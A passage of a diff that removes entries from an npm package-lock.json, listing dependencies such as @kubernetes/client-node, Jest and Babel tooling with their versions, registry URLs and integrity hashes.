"sha512-IzL8ZoEDIBRWEzlCcRhOaCupYyN5gdIK+Q6fbFdPDg6HqX6jpkItn7DFIpW9LQzXG6Df9sA7+OKnq0qlz/GaQg==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.2.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.24" - } - }, - "@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true - }, - "@jridgewell/set-array": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.2.1.tgz", - "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==", - "dev": true - }, - "@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "@jridgewell/trace-mapping": { - "version": "0.3.25", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.25.tgz", - "integrity": "sha512-vNk6aEwybGtawWmy/PzwnGDOjCkLWSD2wqvjGGAgOAwCGWySYXfYoxt00IJkTF+8Lb57DwOb3Aa0o9CApepiYQ==", - "dev": true, - "requires": { - "@jridgewell/resolve-uri": "^3.1.0", - "@jridgewell/sourcemap-codec": "^1.4.14" - } - }, - "@jsep-plugin/assignment": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", - "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", - "requires": {} - }, - "@jsep-plugin/regex": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", - "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", - "requires": {} - }, - "@kubernetes/client-node": { - "version": "0.22.3", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.22.3.tgz", - "integrity": "sha512-dG8uah3+HDJLpJEESshLRZlAZ4PgDeV9mZXT0u1g7oy4KMRzdZ7n5g0JEIlL6QhK51/2ztcIqURAnjfjJt6Z+g==", - "requires": { - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^10.2.0", - "openid-client": "^6.1.3", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^7.0.0", - "tslib": "^2.4.1", - "ws": "^8.18.0" - }, - "dependencies": { - "argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "requires": { - "argparse": "^2.0.1" - } - } - } - }, - "@pkgjs/parseargs": { - "version": "0.11.0", - "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", - "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", - "optional": true - }, - "@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "@sinonjs/commons": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.1.tgz", - "integrity": "sha512-K3mCHKQ9sVh8o1C9cxkwxaOmXoAMlDxC1mYyHrjqOWEcBjYr76t96zL2zlj5dUGZ3HSw240X1qgH3Mjf1yJWpQ==", - "dev": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "requires": { - "@sinonjs/commons": "^3.0.0" - } - }, - "@types/babel__core": { - "version": "7.20.5", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", - "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", - "dev": true, - "requires": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "@types/babel__generator": { - "version": "7.6.8", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.8.tgz", - "integrity": "sha512-ASsj+tpEDsEiFr1arWrlN6V3mdfjRMZt6LtK/Vp/kreFLnr5QH5+DhvD5nINYZXzwJvXeGq+05iUXcAzVrqWtw==", - "dev": true, - "requires": { - "@babel/types": "^7.0.0" - } - }, - "@types/babel__template": { - "version": "7.4.4", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", - "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "@types/babel__traverse": { - "version": "7.20.5", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.5.tgz", - "integrity": "sha512-WXCyOcRtH37HAUkpXhUduaxdm82b4GSlyTqajXviN4EfiuPgNYR109xMCKvpl6zPIpua0DGlMEDCq+g8EdoheQ==", - "dev": true, - "requires": { - "@babel/types": "^7.20.7" - } - }, - "@types/graceful-fs": { - "version": "4.1.9", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.9.tgz", - "integrity": "sha512-olP3sd1qOEe5dXTSaFvQG+02VdRXcdytWLAZsAq1PecU8uqQAhkrnbli7DagjtXKW/Bl7YJbUsa8MPcuc8LHEQ==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/istanbul-lib-coverage": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.3.tgz", - "integrity": "sha512-sz7iLqvVUg1gIedBOvlkxPlc8/uVzyS5OwGz1cKjXzkl3FpL3al0crU8YGU1WoHkxn0Wxbw5tyi6hvzJKNzFsw==", - "dev": true - }, - "@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "requires": { - "@types/istanbul-lib-coverage": "*" - } - }, - "@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "requires": { - "@types/istanbul-lib-report": "*" - } - }, - "@types/jest": { - "version": "29.5.14", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.14.tgz", - "integrity": "sha512-ZN+4sdnLUbo8EVvVc2ao0GFW6oVrQRPn4K2lglySj7APvSrgzxHiNNK99us4WDMi57xxA2yggblIAMNhXOotLQ==", - "dev": true, - "requires": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "@types/node": { - "version": "22.10.2", - "resolved": "https://registry.npmjs.org/@types/node/-/node-22.10.2.tgz", - "integrity": "sha512-Xxr6BBRCAOQixvonOye19wnzyDiUtTeqldOOmj3CkeblonbccA12PFwlufvRdrpjXxqnmUaeiU5EOA+7s5diUQ==", - "dev": true, - "requires": { - "undici-types": "~6.20.0" - } - }, - "@types/parse-json": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@types/parse-json/-/parse-json-4.0.2.tgz", - "integrity": "sha512-dISoDXWWQwUquiKsyZ4Ng+HX2KsPL7LyHKHQwgGFEA3IaKac4Obd+h2a/a6waisAoepJlBcx9paWqjA8/HVjCw==", - "dev": true - }, - "@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true, - "optional": true, - "peer": true - }, - "@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "@types/yargs": { - "version": "17.0.22", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.22.tgz", - "integrity": "sha512-pet5WJ9U8yPVRhkwuEIp5ktAeAqRZOq4UdAyWLWzxbtpyXnzbtLdKiXAjJzi/KLmPGS9wk86lUFWZFN6sISo4g==", - "dev": true, - "requires": { - "@types/yargs-parser": "*" - } - }, - "@types/yargs-parser": { - "version": "20.2.1", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-20.2.1.tgz", - "integrity": "sha512-7tFImggNeNBVMsn0vLrpn1H1uPrUBdnARPTpZoitY37ZrdJREzf7I16tMrlK3hen349gr1NYh8CmZQa7CTG6Aw==", - "dev": true - }, - "acorn": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/acorn/-/acorn-7.4.1.tgz", - "integrity": "sha512-nQyp0o1/mNdbTO1PO6kHkwSrmgZ0MT/jCCpNiwbUjGoRN4dlBhqJtoQuCnEOKzgTVwg0ZWiCoQy6SxMebQVh8A==", - "dev": true, - "peer": true - }, - "acorn-jsx": { - "version": "5.3.2", - "resolved": "https://registry.npmjs.org/acorn-jsx/-/acorn-jsx-5.3.2.tgz", - "integrity": "sha512-rq9s+JNhf0IChjtDXxllJ7g41oZk5SlXtp0LHwyA5cejwn7vKmKp4pPri6YEePv2PU65sAsegbXtIinmDFDXgQ==", - "dev": true, - "peer": true, - "requires": {} - }, - "ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "requires": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - } - }, - "ansi-colors": { - "version": "4.1.1", - "resolved": "https://registry.npmjs.org/ansi-colors/-/ansi-colors-4.1.1.tgz", - "integrity": "sha512-JoX0apGbHaUJBNl6yF+p6JAFYZ666/hhCGKN5t9QFjbJQKUU/g8MNbFDbvfrgKXvI1QpZplPOnwIo99lX/AAmA==", - "dev": true, - "peer": true - }, - "ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "requires": { - "type-fest": "^0.21.3" - }, - "dependencies": { - "type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true - } - } - }, - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==" - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "requires": { - "color-convert": "^2.0.1" - } - }, - "anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "requires": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - } - }, - "argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "requires": { - "sprintf-js": "~1.0.2" - } - }, - "asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", - "requires": { - "safer-buffer": "~2.1.0" - } - }, - "assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==" - }, - "astral-regex": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/astral-regex/-/astral-regex-2.0.0.tgz", - "integrity": "sha512-Z7tMw1ytTXt5jqMcOP+OQteU1VuNK9Y02uuJtKQ1Sv69jXQKKg5cibLwGJow8yzZP+eAc18EmLGPal0bp36rvQ==", - "dev": true, - "peer": true - }, - "async": { - "version": "3.2.5", - "resolved": "https://registry.npmjs.org/async/-/async-3.2.5.tgz", - "integrity": "sha512-baNZyqaaLhyLVKm/DlvdW051MSgO6b8eVfIezl9E5PqWxFgzLm/wQntEW4zOytVburDEr0JlALEpdOFwvErLsg==", - "dev": true - }, - "asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" - }, - "aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==" - }, - "aws4": { - "version": "1.12.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", - "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" - }, - "babel-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.7.0.tgz", - "integrity": "sha512-BrvGY3xZSwEcCzKvKsCi2GgHqDqsYkOP4/by5xCgIwGXQxIEh+8ew3gmrE1y7XRR6LHZIj6yLYnUi/mm2KXKBg==", - "dev": true, - "requires": { - "@jest/transform": "^29.7.0", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.6.3", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - } - }, - "babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "dependencies": { - "istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "requires": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - } - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true - } - } - }, - "babel-plugin-jest-hoist": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.6.3.tgz", - "integrity": "sha512-ESAc/RJvGTFEzRwOTT4+lNDk/GNHMkKbNzsvT0qKRfDyyYTskxB5rnU2njIDYVxXCBHHEI1c0YwHob3WaYujOg==", - "dev": true, - "requires": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - } - }, - "babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "requires": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - } - }, - "babel-preset-jest": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.6.3.tgz", - "integrity": "sha512-0B3bhxR6snWXJZtR/RliHTDPRgn1sNHOR0yVtq/IiQFyuOVjFS+wuio/R4gSNkyYmKmJB4wGZv2NZanmKmTnNA==", - "dev": true, - "requires": { - "babel-plugin-jest-hoist": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0" - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" - }, - "bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", - "requires": { - "tweetnacl": "^0.14.3" - } - }, - "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "requires": { - "fill-range": "^7.1.1" - } - }, - "browserslist": { - "version": "4.23.0", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.23.0.tgz", - "integrity": "sha512-QW8HiM1shhT2GuzkvklfjcKDiWFXHOeFCIA/huJPwHsslwcydgk7X+z2zXpEijP98UCY7HbubZt5J2Zgvf0CaQ==", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001587", - "electron-to-chromium": "^1.4.668", - "node-releases": "^2.0.14", - "update-browserslist-db": "^1.0.13" - } - }, - "bs-logger": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", - "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", - "dev": true, - "requires": { - "fast-json-stable-stringify": "2.x" - } - }, - "bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "requires": { - "node-int64": "^0.4.0" - } - }, - "buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha512-s6webAy+R4SR8XVuJWt2V2rGvhnrhxN+9S15GNuTK3wKPOXFF6RNc+8ug2XhH+2s4f+uudG4kUVYmYOQWL2g0Q==" - }, - "callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true - }, - "camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true - }, - "caniuse-lite": { - "version": "1.0.30001610", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001610.tgz", - "integrity": "sha512-QFutAY4NgaelojVMjY63o6XlZyORPaLfyMnsl3HgnWdJUcX6K0oaJymHjH8PT5Gk7sTm8rvC/c5COUQKXqmOMA==", - "dev": true - }, - "caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" - }, - "chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "requires": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - } - }, - "char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true - }, - "chownr": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", - "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==" - }, - "ci-info": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.2.0.tgz", - "integrity": "sha512-dVqRX7fLUm8J6FgHJ418XuIgDLZDkYcDFTeL6TA2gt5WlIZUQrrH6EZrNClwT/H0FateUsZkGIOPRrLbP+PR9A==", - "dev": true - }, - "cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "requires": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - } - }, - "co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true - }, - "collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, - "combined-stream": { - "version": "1.0.8", - "resolved": 